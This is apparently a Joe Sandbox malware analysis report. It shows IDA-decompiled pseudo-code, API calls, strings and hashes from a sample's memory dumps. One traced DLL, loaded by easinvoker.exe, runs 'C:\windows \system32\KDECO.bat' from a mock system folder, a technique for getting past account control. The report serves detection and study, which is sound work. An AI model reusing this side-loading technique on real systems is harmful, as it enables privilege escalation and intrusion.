                                                                                                  										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                                                  										__eflags = 0xf;
                                                                                                  									}
                                                                                                  									 *(_t196 - 4) = _t136 | _t208;
                                                                                                  									_t139 = _t157;
                                                                                                  									_t174 =  *(_t182 - 4);
                                                                                                  									__eflags = _t174 & 0x00000001;
                                                                                                  									if((_t174 & 0x00000001) != 0) {
                                                                                                  										_t102 = _t182;
                                                                                                  										_t175 = _t174 & 0xfffffff0;
                                                                                                  										_t139 = _t139 + _t175;
                                                                                                  										_t182 = _t182 + _t175;
                                                                                                  										__eflags = _t175 - 0xb30;
                                                                                                  										if(_t175 >= 0xb30) {
                                                                                                  											E028514C0(_t102);
                                                                                                  										}
                                                                                                  									} else {
                                                                                                  										 *(_t182 - 4) = _t174 | 0x00000008;
                                                                                                  									}
                                                                                                  									 *((intOrPtr*)(_t182 - 8)) = _t139;
                                                                                                  									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
                                                                                                  									__eflags = _t139 - 0xb30;
                                                                                                  									if(_t139 >= 0xb30) {
                                                                                                  										E02851500(_t196 + _t208, _t157, _t139);
                                                                                                  									}
                                                                                                  									 *0x28a3718 = 0;
                                                                                                  									return _t196;
                                                                                                  								} else {
                                                                                                  									__eflags = _t205 - 0xb2c;
                                                                                                  									if(_t205 < 0xb2c) {
                                                                                                  										_t190 = __edx;
                                                                                                  										_t111 = E02851724(__edx);
                                                                                                  										__eflags = _t111;
                                                                                                  										if(_t111 != 0) {
                                                                                                  											E028514A4(_t196, _t190, _t111);
                                                                                                  											E02851A8C(_t196, _t190);
                                                                                                  										}
                                                                                                  										return _t111;
                                                                                                  									} else {
                                                                                                  										_t166 = 0xb2c;
                                                                                                  										goto L19;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								return __eax;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t141 =  *_t145;
                                                                                                  					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                                                  					if(_t160 < __edx) {
                                                                                                  						_push(__edi);
                                                                                                  						_t193 = __edx;
                                                                                                  						asm("adc eax, 0xffffffff");
                                                                                                  						_t119 = E02851724((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
                                                                                                  						__eflags = _t119;
                                                                                                  						if(_t119 != 0) {
                                                                                                  							__eflags = _t193 - 0x40a2c;
                                                                                                  							if(_t193 > 0x40a2c) {
                                                                                                  								 *((intOrPtr*)(_t119 - 8)) = _t193;
                                                                                                  							}
                                                                                                  							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                                                  							_t195 = _t119;
                                                                                                  							 *((intOrPtr*)(_t141 + 0x1c))();
                                                                                                  							E02851A8C(_t196, _t195);
                                                                                                  							_t119 = _t195;
                                                                                                  						}
                                                                                                  						return _t119;
                                                                                                  					} else {
                                                                                                  						if(0x40 + __edx * 4 < _t160) {
                                                                                                  							_t143 = __edx;
                                                                                                  							_t125 = E02851724(__edx);
                                                                                                  							__eflags = _t125;
                                                                                                  							if(_t125 != 0) {
                                                                                                  								E028514A4(_t196, _t143, _t125);
                                                                                                  								E02851A8C(_t196, __edi);
                                                                                                  								return _t125;
                                                                                                  							}
                                                                                                  							return _t125;
                                                                                                  						} else {
                                                                                                  							return __eax;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x02851fab
                                                                                                  0x02851fab
                                                                                                  0x02851f66
                                                                                                  0x02851d0d
                                                                                                  0x02851d0f
                                                                                                  0x02851d12
                                                                                                  0x02851d13
                                                                                                  0x02851d16
                                                                                                  0x02851d19
                                                                                                  0x02851d1c
                                                                                                  0x02851d1f
                                                                                                  0x02851e24
                                                                                                  0x02851e27
                                                                                                  0x02851e29
                                                                                                  0x02851f10
                                                                                                  0x02851f1b
                                                                                                  0x02851f22
                                                                                                  0x02851f24
                                                                                                  0x02851f27
                                                                                                  0x02851f2c
                                                                                                  0x02851f2d
                                                                                                  0x02851f2f
                                                                                                  0x00000000
                                                                                                  0x02851f31
                                                                                                  0x02851f31
                                                                                                  0x02851f37
                                                                                                  0x02851f39
                                                                                                  0x02851f39
                                                                                                  0x02851f44
                                                                                                  0x02851f4b
                                                                                                  0x02851f56
                                                                                                  0x02851f56
                                                                                                  0x02851e2f
                                                                                                  0x02851e2f
                                                                                                  0x02851e32
                                                                                                  0x02851e35
                                                                                                  0x02851e37
                                                                                                  0x00000000
                                                                                                  0x02851e3d
                                                                                                  0x02851e3d
                                                                                                  0x02851e44
                                                                                                  0x02851e95
                                                                                                  0x02851e95
                                                                                                  0x02851e9a
                                                                                                  0x02851ea0
                                                                                                  0x02851ea5
                                                                                                  0x02851ea6
                                                                                                  0x02851ea6
                                                                                                  0x02851eb2
                                                                                                  0x02851ec3
                                                                                                  0x02851ec9
                                                                                                  0x02851ec9
                                                                                                  0x02851ecb
                                                                                                  0x02851ed8
                                                                                                  0x02851edf
                                                                                                  0x02851ee3
                                                                                                  0x02851ee5
                                                                                                  0x02851eeb
                                                                                                  0x02851eed
                                                                                                  0x02851eef
                                                                                                  0x02851eef
                                                                                                  0x02851ecd
                                                                                                  0x02851ecd
                                                                                                  0x02851ed1
                                                                                                  0x02851ed1
                                                                                                  0x02851ef4
                                                                                                  0x02851ef4
                                                                                                  0x02851ef6
                                                                                                  0x02851ef9
                                                                                                  0x02851f00
                                                                                                  0x02851f02
                                                                                                  0x02851f06
                                                                                                  0x02851e46
                                                                                                  0x02851e46
                                                                                                  0x02851e4b
                                                                                                  0x02851e53
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02851e59
                                                                                                  0x02851e5e
                                                                                                  0x02851e5f
                                                                                                  0x02851e65
                                                                                                  0x02851e6d
                                                                                                  0x02851e73
                                                                                                  0x02851e78
                                                                                                  0x02851e79
                                                                                                  0x00000000
                                                                                                  0x02851e79
                                                                                                  0x00000000
                                                                                                  0x02851e6d
                                                                                                  0x02851e81
                                                                                                  0x02851e84
                                                                                                  0x02851e87
                                                                                                  0x02851e89
                                                                                                  0x02851f09
                                                                                                  0x02851f09
                                                                                                  0x00000000
                                                                                                  0x02851e8b
                                                                                                  0x02851e8b
                                                                                                  0x02851e8e
                                                                                                  0x02851e91
                                                                                                  0x02851e93
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02851e93
                                                                                                  0x02851e89
                                                                                                  0x02851e44
                                                                                                  0x02851e37
                                                                                                  0x02851d25
                                                                                                  0x02851d25
                                                                                                  0x02851d28
                                                                                                  0x02851d2a
                                                                                                  0x02851d34
                                                                                                  0x02851d3a
                                                                                                  0x02851d4d
                                                                                                  0x02851d4d
                                                                                                  0x02851d59
                                                                                                  0x02851d5f
                                                                                                  0x02851d61
                                                                                                  0x02851d68
                                                                                                  0x02851d6a
                                                                                                  0x02851d6f
                                                                                                  0x02851d77
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x02851d7c
                                                                                                  0x02851d81
                                                                                                  0x02851d87
                                                                                                  0x02851d8f
                                                                                                  0x02851d94
                                                                                                  0x02851d99
                                                                                                  0x00000000
                                                                                                  0x02851d99
                                                                                                  0x00000000
                                                                                                  0x02851d8f
                                                                                                  0x02851da1
                                                                                                  0x02851da1
                                                                                                  0x02851da1
                                                                                                  0x02851da6
                                                                                                  0x02851da9
                                                                                                  0x02851dab
                                                                                                  0x02851dae
                                                                                                  0x02851db1
                                                                                                  0x02851dbc
                                                                                                  0x02851dbe
                                                                                                  0x02851dc1
                                                                                                  0x02851dc3
                                                                                                  0x02851dc5
                                                                                                  0x02851dcb
                                                                                                  0x02851dcd
                                                                                                  0x02851dcd
                                                                                                  0x02851db3
                                                                                                  0x02851db6
                                                                                                  0x02851db6
                                                                                                  0x02851dd2
                                                                                                  0x02851dd8
                                                                                                  0x02851ddc
                                                                                                  0x02851de2
                                                                                                  0x02851de9
                                                                                                  0x02851de9
                                                                                                  0x02851dee
                                                                                                  0x02851dfb
                                                                                                  0x02851d3c
                                                                                                  0x02851d3c
                                                                                                  0x02851d42
                                                                                                  0x02851dfc
                                                                                                  0x02851e00
                                                                                                  0x02851e05
                                                                                                  0x02851e07
                                                                                                  0x02851e11
                                                                                                  0x02851e18
                                                                                                  0x02851e18
                                                                                                  0x02851e23
                                                                                                  0x02851d48
                                                                                                  0x02851d48
                                                                                                  0x00000000
                                                                                                  0x02851d48
                                                                                                  0x02851d42
                                                                                                  0x02851d2c
                                                                                                  0x02851d30
                                                                                                  0x02851d30
                                                                                                  0x02851d2a
                                                                                                  0x02851d1f
                                                                                                  0x02851c7c
                                                                                                  0x02851c7c
                                                                                                  0x02851c82
                                                                                                  0x02851c87
                                                                                                  0x02851cc4
                                                                                                  0x02851cc5
                                                                                                  0x02851ccb
                                                                                                  0x02851cd2
                                                                                                  0x02851cd7
                                                                                                  0x02851cd9
                                                                                                  0x02851cdb
                                                                                                  0x02851ce1
                                                                                                  0x02851ce3
                                                                                                  0x02851ce3
                                                                                                  0x02851cea
                                                                                                  0x02851cef
                                                                                                  0x02851cf3
                                                                                                  0x02851cf8
                                                                                                  0x02851cfd
                                                                                                  0x02851cfd
                                                                                                  0x02851d02
                                                                                                  0x02851c89
                                                                                                  0x02851c92
                                                                                                  0x02851c98
                                                                                                  0x02851c9c
                                                                                                  0x02851ca1
                                                                                                  0x02851ca3
                                                                                                  0x02851cad
                                                                                                  0x02851cb4
                                                                                                  0x00000000
                                                                                                  0x02851cb9
                                                                                                  0x02851cbd
                                                                                                  0x02851c96
                                                                                                  0x02851c96
                                                                                                  0x02851c96
                                                                                                  0x02851c92
                                                                                                  0x02851c87

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 292e506db200ae0628b982862be2d5f05e2563caa5baa89d227a39618a67d797
                                                                                                  • Instruction ID: 4401bb85eae86f227676d4196107516427a89db6ae504d757577b4227b12064c
                                                                                                  • Opcode Fuzzy Hash: 292e506db200ae0628b982862be2d5f05e2563caa5baa89d227a39618a67d797
                                                                                                  • Instruction Fuzzy Hash: 06A108AE7106200BE719AA7C9C883BDB3C2DBC4325F18867EE91DCB385EB64CD518751
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E028594D0(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                                  				char _v8;
                                                                                                  				short _v18;
                                                                                                  				short _v22;
                                                                                                  				struct _SYSTEMTIME _v24;
                                                                                                  				char _v280;
                                                                                                  				intOrPtr _v284;
                                                                                                  				char* _t34;
                                                                                                  				intOrPtr* _t50;
                                                                                                  				intOrPtr _t59;
                                                                                                  				void* _t64;
                                                                                                  				intOrPtr _t66;
                                                                                                  				void* _t70;
                                                                                                  
                                                                                                  				_v8 = 0;
                                                                                                  				_t50 = __edx;
                                                                                                  				_t64 = __eax;
                                                                                                  				_push(_t70);
                                                                                                  				_push(0x28595be);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t70 + 0xfffffee8;
                                                                                                  				E028544A0(__edx);
                                                                                                  				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
                                                                                                  				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
                                                                                                  				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
                                                                                                  				if(_t64 > 2) {
                                                                                                  					E02854538( &_v8, 0x28595e0);
                                                                                                  				} else {
                                                                                                  					E02854538( &_v8, 0x28595d4);
                                                                                                  				}
                                                                                                  				_t34 = E02854964(_v8);
                                                                                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
                                                                                                  					E02854710(_t50, 0x100,  &_v280);
                                                                                                  					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
                                                                                                  						_v284 =  *_t50;
                                                                                                  						_t66 = _v284;
                                                                                                  						if(_t66 != 0) {
                                                                                                  							_t66 =  *((intOrPtr*)(_t66 - 4));
                                                                                                  						}
                                                                                                  						E028549C4( *_t50, _t66 - 1, 2, _t50);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_pop(_t59);
                                                                                                  				 *[fs:eax] = _t59;
                                                                                                  				_push(0x28595c5);
                                                                                                  				return E028544A0( &_v8);
                                                                                                  			}
















                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028595BE), ref: 02859556
                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028595BE), ref: 0285955C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                  • String ID: yyyy
                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                  • Opcode ID: d53e8720b6809156618f00e375c9bc29876514350754d8463e0c1d4c3e83c376
                                                                                                  • Instruction ID: cfe32399c8cfc6340afd7c53f18c89bef1df025def72a8844467431cdeedb32c
                                                                                                  • Opcode Fuzzy Hash: d53e8720b6809156618f00e375c9bc29876514350754d8463e0c1d4c3e83c376
                                                                                                  • Instruction Fuzzy Hash: 41215C7DA042289FDB11DFA8C841AAEB3F9EF48710F4140A5ED09E7250D7749E54CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02868110(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  				unsigned int _v8;
                                                                                                  				void* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				int _t22;
                                                                                                  				void* _t36;
                                                                                                  				void* _t43;
                                                                                                  				void* _t45;
                                                                                                  				void* _t46;
                                                                                                  
                                                                                                  				_t43 = _a12;
                                                                                                  				_v20 = _a16 - _a4;
                                                                                                  				_t36 = _a12 + 8;
                                                                                                  				while(1) {
                                                                                                  					_t22 = IsBadReadPtr(_t43, 8);
                                                                                                  					if(_t22 != 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_t22 = IsBadReadPtr(_t36, 4);
                                                                                                  					if(_t22 != 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_t22 = _a12 + _a20;
                                                                                                  					if(_t22 > _t43) {
                                                                                                  						_v8 =  *((intOrPtr*)(_t43 + 4)) - 8 >> 1;
                                                                                                  						_t45 = _v8 - 1;
                                                                                                  						if(_t45 < 0) {
                                                                                                  							L8:
                                                                                                  							_t43 = _t36;
                                                                                                  							_t36 = _t36 + 8;
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						_t46 = _t45 + 1;
                                                                                                  						do {
                                                                                                  							if(IsBadReadPtr(_t36, 4) == 0 && ( *_t36 & 0x0000ffff ^ 0x00003000) < 0x1000) {
                                                                                                  								_v16 = ( *_t36 & 0x0000ffff) % 0x3000 +  *_t43 + _a8;
                                                                                                  								if(IsBadWritePtr(_v16, 4) == 0) {
                                                                                                  									 *_v16 =  *_v16 + _v20;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t36 = _t36 + 2;
                                                                                                  							_t46 = _t46 - 1;
                                                                                                  						} while (_t46 != 0);
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  					break;
                                                                                                  				}
                                                                                                  				return _t22;
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02868144
                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02868174
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02868193
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0286819F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Read$Write
                                                                                                  • String ID:
                                                                                                  • API String ID: 3448952669-0
                                                                                                  • Opcode ID: c5c57ebb1ccfdf97f91a838f5fe6b39f74773a0fe3b05516c2e2fcb04ee082ca
                                                                                                  • Instruction ID: d32ff50300fa1facb52569376031fbfc97312be6798013eafe91463b70919562
                                                                                                  • Opcode Fuzzy Hash: c5c57ebb1ccfdf97f91a838f5fe6b39f74773a0fe3b05516c2e2fcb04ee082ca
                                                                                                  • Instruction Fuzzy Hash: 2A21B4BDA40229ABDB50CF19CC85BBE73AAEF80360F044115EE18DB340E734E8118AA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:3.3%
                                                                                                  Total number of Nodes:122
                                                                                                  Total number of Limit Nodes:3

                                                                                                  Callgraph


                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 0 613c1446-613c1471 WinExec ExitProcess
                                                                                                  APIs
                                                                                                  • WinExec.KERNEL32(?,?,?,613C14A5), ref: 613C1461
                                                                                                  • ExitProcess.KERNEL32(?,?,?,613C14A5), ref: 613C146F
                                                                                                  Strings
                                                                                                  • C:\windows \system32\KDECO.bat, xrefs: 613C1453
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecExitProcess
                                                                                                  • String ID: C:\windows \system32\KDECO.bat
                                                                                                  • API String ID: 4112423671-3197246866
                                                                                                  • Opcode ID: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
                                                                                                  • Instruction ID: 4c5d8cd5d910ffdc7edc5c81563eb71587e0c072eced2b6f5a338f6d84e390be
                                                                                                  • Opcode Fuzzy Hash: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
                                                                                                  • Instruction Fuzzy Hash: 29D0123431192888FB00AB66FCA23D12322E794B40F5C0021C81E5B3B0CE2ACA228380
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • RtlAddFunctionTable.KERNEL32 ref: 613C1EEA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FunctionTable
                                                                                                  • String ID: .pdata
                                                                                                  • API String ID: 1252446317-4177594709
                                                                                                  • Opcode ID: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
                                                                                                  • Instruction ID: 9b48684eaa54373ac2d77e7686239314a7b50e7976879dfb6e5eb98d9026d313
                                                                                                  • Opcode Fuzzy Hash: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
                                                                                                  • Instruction Fuzzy Hash: 0621D272702164CAFB058F69D9443947BB2A789F9CF4CC020CE0E97304EB36CA51DB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • RtlCaptureContext.KERNEL32 ref: 613C1B74
                                                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 613C1B8B
                                                                                                  • RtlVirtualUnwind.KERNEL32 ref: 613C1BCD
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 613C1C14
                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 613C1C21
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 613C1C27
                                                                                                  • TerminateProcess.KERNEL32 ref: 613C1C35
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                                  • String ID: @u<a
                                                                                                  • API String ID: 3266983031-2704016811
                                                                                                  • Opcode ID: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
                                                                                                  • Instruction ID: f94ddf039621e221967baa8edb73e03f7702b5fa200f94eb725674a2b633c061
                                                                                                  • Opcode Fuzzy Hash: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
                                                                                                  • Instruction Fuzzy Hash: 0B21E375611B64C9EB008F62F8443C937B6BB48B98F495126DD8F27724EF3AC6248390
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: @y<a$Hy<a$PA<a$Py<a$Xy<a
                                                                                                  • API String ID: 3472027048-4231909830
                                                                                                  • Opcode ID: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
                                                                                                  • Instruction ID: fa2c0e70f73d20439f9ad63a0ffe88be5d3e49048c325fff2c4482aeb8ecd435
                                                                                                  • Opcode Fuzzy Hash: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
                                                                                                  • Instruction Fuzzy Hash: A041C136702624C9F7029B5AE95039527B6A784FDCF48C022DE0E97354DF3ACD91D352
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00007FF77FF780559E54(long long __rbx, signed long long _a16, long long _a32) {
                                                                                                  
                                                                                                  				_a32 = __rbx;
                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                  			}



                                                                                                  0x7ff780559e54
                                                                                                  0x7ff780559e68

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546849860.00007FF780541000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF780540000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546835544.00007FF780540000.00000002.00000001.01000000.00000006.sdmp
                                                                                                  • Associated: 0000000B.00000002.546909039.00007FF78055C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                  • Associated: 0000000B.00000002.546921484.00007FF78055D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_7ff780540000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 4104442557-0
                                                                                                  • Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                                  • Instruction ID: b84cfc2dfe37cdf6a13a69064579befeba3fa8b15c1974f46ad156cd9d7d21a1
                                                                                                  • Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                                  • Instruction Fuzzy Hash: 86113032604F418AEB10DF74E85956973A4FB0A758F941A31FA5D87BA4DF3CE2A4C360
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1870
                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1892
                                                                                                  Strings
                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 613C19AC
                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 613C194B
                                                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691, 613C1995
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
